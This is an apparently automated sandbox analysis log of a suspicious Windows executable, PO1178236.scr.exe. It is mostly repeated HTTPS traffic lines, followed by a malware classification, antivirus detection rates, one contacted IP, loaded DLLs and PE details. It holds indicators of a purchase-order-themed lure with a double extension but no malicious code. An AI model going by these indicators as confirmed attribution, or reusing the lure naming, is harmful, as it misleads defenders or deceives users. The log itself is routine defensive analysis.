Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49962
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49840
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49961
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49960
Source: unknownNetwork traffic detected: HTTP traffic on port 49966 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49989 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49748 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49760 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49828 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49933 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49805 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49719
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49718
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49839
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49717
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49838
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49959
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49837
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49716
Source: unknownNetwork traffic detected: HTTP traffic on port 49715 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49958
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49715
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49836
Source: unknownNetwork traffic detected: HTTP traffic on port 49921 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49957
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49714
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49835
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49956
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49713
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49834
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49955
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49712
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49833
Source: unknownNetwork traffic detected: HTTP traffic on port 49887 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49954
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49711
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49832
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49953
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49710
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49831
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49952
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49830
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49951
Source: unknownNetwork traffic detected: HTTP traffic on port 49839 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49864 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49950
Source: unknownNetwork traffic detected: HTTP traffic on port 49944 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49726 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49910 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49853 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49796 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49709
Source: unknownNetwork traffic detected: HTTP traffic on port 49955 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49708
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49829
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49707
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49828
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49949
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49827
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49948
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49826
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49947
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49825
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49946
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49824
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49945
Source: unknownNetwork traffic detected: HTTP traffic on port 49737 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49823
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49944
Source: unknownNetwork traffic detected: HTTP traffic on port 49771 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49822
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49943
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49788
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49787
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49786
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49785
Source: unknownNetwork traffic detected: HTTP traffic on port 49922 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49784
Source: unknownNetwork traffic detected: HTTP traffic on port 49945 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49783
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49782
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49781
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49780
Source: unknownNetwork traffic detected: HTTP traffic on port 49968 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49785 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49807 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49980 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49713 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49736 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49759 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49779
Source: unknownNetwork traffic detected: HTTP traffic on port 49885 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49778
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49899
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49777
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49898
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49776
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49897
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49775
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49896
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49774
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49895
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49773
Source: unknownNetwork traffic detected: HTTP traffic on port 49862 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49894
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49772
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49893
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49771
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49892
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49770
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49891
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49890
Source: unknownNetwork traffic detected: HTTP traffic on port 49724 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49897 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49911 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49957 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49851 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49830 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49769
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49768
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49889
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49767
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49888
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49766
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49887
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49765
Source: unknownNetwork traffic detected: HTTP traffic on port 49758 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49886
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49764
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49885
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49763
Source: unknownNetwork traffic detected: HTTP traffic on port 49863 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49884
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49762
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49883
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49761
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49882
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49760
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49881
Source: unknownNetwork traffic detected: HTTP traffic on port 49840 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49880
Source: unknownNetwork traffic detected: HTTP traffic on port 49725 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49896 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49770 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49797 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49956 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50005 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49979 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49759
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49758
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49879
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49757
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49878
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49999
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49756
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49877
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49998
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49755
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49876
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49997
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49875
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49754
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49996
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49753
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49874
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49995
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49752
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49873
Source: unknownNetwork traffic detected: HTTP traffic on port 49923 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49994
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49751
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49872
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49993
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49750
Source: unknownNetwork traffic detected: HTTP traffic on port 49818 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49871
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49870
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
Source: unknownNetwork traffic detected: HTTP traffic on port 49786 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49874 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49747 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49829 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49934 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49749
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49748
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49869
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49747
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49868
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49989
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49746
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49867
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49988
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49745
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49866
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49987
Source: unknownNetwork traffic detected: HTTP traffic on port 49746 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49769 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49803 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49826 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49906 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49849 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49900 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49837 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49711 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49975 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49929 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49872 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49964 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49798 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49861 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49735 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49999 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49712 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49918 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49873 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49787 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49930 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49745 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50001 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49986 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49850 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49963 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49757 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49799
Source: unknownNetwork traffic detected: HTTP traffic on port 49734 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49798
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49797
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49796
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49795
Source: unknownNetwork traffic detected: HTTP traffic on port 49952 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49794
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49793
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49792
Source: unknownNetwork traffic detected: HTTP traffic on port 49814 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49790
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50001
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50000
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50003
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50002
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50005
Source: unknownNetwork traffic detected: HTTP traffic on port 49895 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 50004
Source: unknownNetwork traffic detected: HTTP traffic on port 49768 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49723 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49825 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49884 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49907 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49941 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49789
Source: unknownNetwork traffic detected: HTTP traffic on port 49733 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49997 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49710 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49779 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49859 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49871 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49894 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50003 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49965 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49799 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49942 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49977 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49816 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49919 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49954 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49788 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49988 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49767 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49721 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49827 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49848 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49882 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49756 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49838 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49976 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49953 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49815 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49722 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49908 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49860 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49883 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49778 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49755 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49998 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49931 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49804 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49744 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50002 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49987 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49920 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49708 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49926 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49949 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49789 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49800 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49766 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49743 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49961 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49720 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49881 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49950 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49732 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49996 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49812 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49858 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49893 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49915 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49823 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49777 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49790 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49869 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49731 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49972 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49834 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49892 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49904 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49847 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49709 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49927 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49822 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49870 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49765 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49938 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49811 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49754 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49813 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49951 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49974 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49836 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49916 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49939 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49776 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49845 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49868 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49753 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49707 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49742 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49780 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49879 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 50000 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49802 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49905 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49718 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49995 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49928 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49741 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49764 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49719 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49801 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49940 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49824 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49973 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49891 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49730 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49835 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49917 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49880 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49962 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49775 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49846 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49792 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49890 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49970 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49781 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49878 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49912 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49935 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49958 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49717 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49889 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49866 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49820 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49946 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49728 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49763 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49855 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49981 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49752 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49901 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49924 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49819 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49844 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49947 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49793 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49831 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49751 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49774 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49782 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49969 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49994 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49740 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49856 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49913 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49808 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 49867 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49821
Source: unknownNetwork traffic detected: HTTP traffic on port 49865 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49942
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49820
Source: unknownNetwork traffic detected: HTTP traffic on port 49842 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49941
Source: unknownHTTPS traffic detected: 188.114.96.3:443 -> 192.168.2.9:49707 version: TLS 1.2
Source: PO1178236.scr.exe, 00000000.00000000.1401231435.00000000002F4000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenamePO1178236.exe4 vs PO1178236.scr.exe
Source: PO1178236.scr.exe, 00000000.00000002.3252036254.00000000008EE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs PO1178236.scr.exe
Source: PO1178236.scr.exeBinary or memory string: OriginalFilenamePO1178236.exe4 vs PO1178236.scr.exe
Source: PO1178236.scr.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
Source: classification engineClassification label: mal60.evad.winEXE@1/0@1/1
Source: C:\Users\user\Desktop\PO1178236.scr.exeMutant created: NULL
Source: PO1178236.scr.exeStatic PE information: Section: .text IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
Source: PO1178236.scr.exeStatic file information: TRID: Win32 Executable (generic) Net Framework (10011505/4) 49.83%
Source: C:\Users\user\Desktop\PO1178236.scr.exeKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
Source: PO1178236.scr.exeVirustotal: Detection: 59%
Source: PO1178236.scr.exeReversingLabs: Detection: 65%
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: mscoree.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: apphelp.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: kernel.appcore.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: version.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: vcruntime140_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: ucrtbase_clr0400.dllJump to behavior
Source: C:\Users\user\Desktop\PO1178236.scr.exeSection loaded: windows.storage.dllJump to behavior
